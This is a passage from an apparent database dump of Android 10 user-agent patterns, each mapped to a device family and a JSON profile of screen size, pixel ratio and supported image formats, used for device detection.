Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; VOG-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; VOG-L29; HMSCore 5.0; GMSCore 20.24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; W-K211-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; W-K560-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; W-V680-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; W-V730-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; W-V830-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; W-V850-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; W-V851-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; WP5 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; WP5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; WP8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; X30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; X5-LG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; X95) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; XQ-AS52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; XQ-AU51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; XQ-AU52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; YAL-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; YAL-L41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZS620KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":856,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZS630KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZTE 8010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZTE A2020G Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZTE A2021E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZTE A7020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZTE Blade L210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ZTE Blade V1000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; dandelion) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; itel A571W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; itel L6006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; itel L6502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; itel P651W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; itel W5002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; itel W6502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; itel W6503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto e(6i)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto e(7) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto e(7) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto e(7)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto e(7i) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g 5G plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g fast) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g stylus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(7) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(7) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":757,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(7) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(7)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":757,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(8) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(8) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(8) power lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":443,\"screenHeight\":985,\"pixelRatio\":1.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(8) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(8)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(9) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(9) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto g(9) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; moto z4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola edge) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one action) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one fusion) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one fusion+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one hyper) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one macro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one vision) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one zoom) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; motorola one) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1804) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1805) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1806) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1929) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1933) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1935) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 1938) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 2015) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 